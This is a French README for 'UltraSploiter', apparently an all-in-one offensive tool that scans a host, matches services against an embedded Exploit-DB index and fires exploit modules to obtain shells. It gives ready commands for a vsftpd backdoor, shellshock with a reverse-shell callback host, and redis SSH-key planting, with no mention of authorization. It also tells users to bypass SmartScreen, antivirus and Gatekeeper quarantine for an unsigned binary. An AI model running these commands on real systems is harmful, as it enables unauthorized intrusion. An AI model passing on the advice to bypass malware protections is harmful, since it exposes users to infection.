Un binaire unique qui combine un scanner de ports, l'index complet d'Exploit-DB (47k entrées) et des modules d'exploitation exécutables en un seul outil. Écrit en Rust, fonctionne sous Linux, Windows et macOS.
scan, match, exploit — une IP en entrée, des shells en sortie.
Un binaire unique qui réunit un scanner de ports, l'index complet d'Exploit-DB et un ensemble de modules d'exploitation exécutables en un seul outil. Fonctionne sur Linux, Windows et macOS.
| tâche | normalement | ici |
|---|---|---|
| Trouver des services sur un hôte | nmap | UltraSploiter scan <ip> |
| Rechercher des exploits | searchsploit | UltraSploiter search <kw> |
| Les déclencher | msfconsole | UltraSploiter exploit <ip> <module> |

La méthode la plus simple et la meilleure est de récupérer le binaire précompilé et de l'exécuter. Rien à installer, aucune dépendance — un seul fichier autonome.
Téléchargez depuis la page Releases :
UltraSploiter-windows-x86_64.exe → double-clicUltraSploiter-linux-x86_64Attention : les outils de sécurité sont signalés. Windows SmartScreen et l'antivirus vous avertiront probablement ou mettront le binaire en quarantaine — cliquez sur Plus d'infos → Exécuter quand même, ou ajoutez une exclusion si vous comptez le garder.
Double-cliquez sur UltraSploiter.exe. Le menu s'ouvre.
Si SmartScreen vous avertit d'un éditeur inconnu (ce sera le cas pour tout binaire non signé), cliquez sur Plus d'infos → Exécuter quand même.
chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64
chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64
Si Gatekeeper le bloque (là encore, tout binaire non signé), faites soit un clic droit → Ouvrir, soit supprimez une fois le drapeau de quarantaine :
xattr -d com.apple.quarantine UltraSploiter-macos-arm64
Nécessaire uniquement s'il n'existe pas de binaire pour votre plateforme, ou si vous souhaitez le modifier. Rust 1.74+ est requis.
sudo apt install build-essential # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
xcode-select --install # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1 # -> UltraSploiter.exe
build.ps1 utilise la toolchain stable-x86_64-pc-windows-gnu, qui se lie avec
MinGW — vous n'avez donc pas besoin de Visual Studio ni de MSVC. Il installe cette toolchain
si elle est absente. Si vous disposez déjà des MSVC Build Tools, un simple
cargo build --release fonctionne aussi.
Attention Windows + GNU :
windows-sys(tiré par tokio) invoquedlltool, qui appelle l'assembleuras— et le composant rust-mingw ne fournit pasas.build.ps1cherche un bin MinGW qui le contient dans%~dp0tools\mingw64\binet%USERPROFILE%\tools\mingw64\bin, et le préfixe àPATHlorsqu'il le trouve. Déposez-y une build winlibs si vous rencontrezerror calling dlltool. Les toolchains MSVC ne sont pas concernées.
Sans argument, vous obtenez le menu :
1) Scan a target find open ports and services
2) Search exploits keyword lookup
3) List runnable modules
4) Run an exploit pick a target and a module
5) Console advanced msf-style commands
0) Exit
UltraSploiter scan 10.0.0.5 # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4 # range, fast timing
UltraSploiter scan 10.0.0.5 -p - # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491 # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console
Sous Linux/macOS, préfixez par ./ (par ex. ./UltraSploiter scan 10.0.0.5).
| option | signification |
|---|---|
-p <spec> | top (1000), 80,443, 1-1024, - (tous) |
-T0..-T5 | modèle de timing — plus lent/discret à plus rapide/bruyant |
-sU | scan par sonde UDP |
-sV | détection de service/version (activée par défaut) |
--no-banner | ignorer la récupération de bannière |
--json | JSON sur stdout |
-oX <file> | XML au format nmap |
Le scanner est asynchrone (tokio) : chaque niveau -T définit combien de sockets sont
en vol simultanément (jusqu'à 8000 à -T5), ce qui couvre le top-1000 de nmap en quelques
secondes. Chaque « open » correspond à un handshake TCP complété, les résultats sont donc exacts.
-o key=value)| clé | utilisée par | signification |
|---|---|---|
lhost, lport | modules rev-shell | adresse de rappel |
rport | modules web | remplacer le port HTTP |
path | shellshock, struts, phpunit | chemin de l'endpoint |
user, pass | tomcat_manager | identifiants du manager |
core | solr_rce | nom du core Solr |
file | grafana_lfi | fichier à lire |
ssh_pubkey | redis_unauth | clé à déposer dans authorized_keys |
src, dst | proftpd_modcopy | copie source / destination |
timeout | tous | délai d'attente socket en secondes |
search et info s'appuient sur l'index complet d'Exploit-DB — plus de 47 000 entrées
(le même jeu de données que celui utilisé par searchsploit), intégré au binaire. Lorsqu'une entrée
porte un CVE qu'un module exécutable implémente, info relie les deux :
$ UltraSploiter info 17491
Exploit-DB 17491
description vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
codes OSVDB-73573;CVE-2011-2523
[runnable] vsftpd_234
UltraSploiter exploit <ip> vsftpd_234